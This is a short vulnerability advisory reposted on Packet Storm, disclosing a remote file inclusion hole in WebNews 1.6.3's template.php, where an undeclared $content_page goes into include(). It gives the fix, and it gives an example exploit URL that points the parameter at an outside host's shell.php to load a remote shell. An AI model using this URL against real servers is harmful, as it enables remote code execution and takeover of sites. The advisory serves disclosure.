WebNews suffers from a remote file inclusion vulnerability.
f0807be021c2cd9280205d1bb27156db<div id="_htmlarea_default_style_" style="font:10pt arial,helvetica,sans-serif">###### ToXiC #########################<br>#<br>#BuG FounD by Drago84<br>#<br>#Application Affect: WebNews<br>#Source Code:<br>#http://prdownloads.sourceforge.net/web-news/WebNews-1.6.3.zip?use_mirror=superb-west<br>#Problem:<br># <?<br># include($content_page);<br># ?><br>#Solution : Declare $content_page<br>#Page Vulnerable : template.php<br><br># Exempe Of ExPloit is:<br>#http://www.site.com/webnews/template.php?content_page=http://marcusbestlamer.gay/shell.php?<br>#GrEatZ All Member of ToXiC, Str0ke<br># ToXic Security <br>######
ToXiC
#########################</div>
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!